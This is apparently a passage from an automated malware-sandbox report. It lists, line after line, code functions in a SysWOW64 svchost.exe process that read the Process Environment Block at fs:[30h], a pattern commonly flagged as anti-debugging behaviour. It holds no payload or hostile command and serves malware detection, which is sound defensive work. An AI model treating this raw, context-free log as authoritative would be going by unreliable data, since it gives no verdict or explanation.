            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B92BC mov eax, dword ptr fs:[00000030h]2_2_033B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B92BC mov eax, dword ptr fs:[00000030h]2_2_033B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B92BC mov ecx, dword ptr fs:[00000030h]2_2_033B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B92BC mov ecx, dword ptr fs:[00000030h]2_2_033B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A0 mov eax, dword ptr fs:[00000030h]2_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A0 mov eax, dword ptr fs:[00000030h]2_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A0 mov eax, dword ptr fs:[00000030h]2_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A0 mov eax, dword ptr fs:[00000030h]2_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F92A6 mov eax, dword ptr fs:[00000030h]2_2_033F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F92A6 mov eax, dword ptr fs:[00000030h]2_2_033F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F92A6 mov eax, dword ptr fs:[00000030h]2_2_033F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F92A6 mov eax, dword ptr fs:[00000030h]2_2_033F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C72A0 mov eax, dword ptr fs:[00000030h]2_2_033C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C72A0 mov eax, dword ptr fs:[00000030h]2_2_033C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034052E2 mov eax, dword ptr fs:[00000030h]2_2_034052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336329E mov eax, dword ptr fs:[00000030h]2_2_0336329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336329E mov eax, dword ptr fs:[00000030h]2_2_0336329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405283 mov eax, dword ptr fs:[00000030h]2_2_03405283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF2F8 mov eax, dword ptr fs:[00000030h]2_2_033EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033292FF mov eax, dword ptr fs:[00000030h]2_2_033292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED mov eax, dword ptr fs:[00000030h]2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B2D3 mov eax, dword ptr fs:[00000030h]2_2_0332B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B2D3 mov eax, dword ptr fs:[00000030h]2_2_0332B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B2D3 mov eax, dword ptr fs:[00000030h]2_2_0332B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335F2D0 mov eax, dword ptr fs:[00000030h]2_2_0335F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335F2D0 mov eax, dword ptr fs:[00000030h]2_2_0335F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C0 mov eax, dword ptr fs:[00000030h]2_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033392C5 mov eax, dword ptr fs:[00000030h]2_2_033392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033392C5 mov eax, dword ptr fs:[00000030h]2_2_033392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03331131 mov eax, dword ptr fs:[00000030h]2_2_03331131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03331131 mov eax, dword ptr fs:[00000030h]2_2_03331131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B136 mov eax, dword ptr fs:[00000030h]2_2_0332B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B136 mov eax, dword ptr fs:[00000030h]2_2_0332B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B136 mov eax, dword ptr fs:[00000030h]2_2_0332B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332B136 mov eax, dword ptr fs:[00000030h]2_2_0332B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405152 mov eax, dword ptr fs:[00000030h]2_2_03405152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F172 mov eax, dword ptr fs:[00000030h]2_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C9179 mov eax, dword ptr fs:[00000030h]2_2_033C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03337152 mov eax, dword ptr fs:[00000030h]2_2_03337152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329148 mov eax, dword ptr fs:[00000030h]2_2_03329148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329148 mov eax, dword ptr fs:[00000030h]2_2_03329148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329148 mov eax, dword ptr fs:[00000030h]2_2_03329148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03329148 mov eax, dword ptr fs:[00000030h]2_2_03329148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B0 mov eax, dword ptr fs:[00000030h]2_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034051CB mov eax, dword ptr fs:[00000030h]2_2_034051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03387190 mov eax, dword ptr fs:[00000030h]2_2_03387190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D71F9 mov esi, dword ptr fs:[00000030h]2_2_033D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033351ED mov eax, dword ptr fs:[00000030h]2_2_033351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336D1D0 mov eax, dword ptr fs:[00000030h]2_2_0336D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0336D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405060 mov eax, dword ptr fs:[00000030h]2_2_03405060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov ecx, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD070 mov ecx, dword ptr fs:[00000030h]2_2_033AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B106E mov eax, dword ptr fs:[00000030h]2_2_033B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D705E mov ebx, dword ptr fs:[00000030h]2_2_033D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D705E mov eax, dword ptr fs:[00000030h]2_2_033D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B052 mov eax, dword ptr fs:[00000030h]2_2_0335B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034050D9 mov eax, dword ptr fs:[00000030h]2_2_034050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335096 mov eax, dword ptr fs:[00000030h]2_2_03335096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D090 mov eax, dword ptr fs:[00000030h]2_2_0335D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D090 mov eax, dword ptr fs:[00000030h]2_2_0335D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336909C mov eax, dword ptr fs:[00000030h]2_2_0336909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D08D mov eax, dword ptr fs:[00000030h]2_2_0332D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033550E4 mov eax, dword ptr fs:[00000030h]2_2_033550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033550E4 mov ecx, dword ptr fs:[00000030h]2_2_033550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033590DB mov eax, dword ptr fs:[00000030h]2_2_033590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
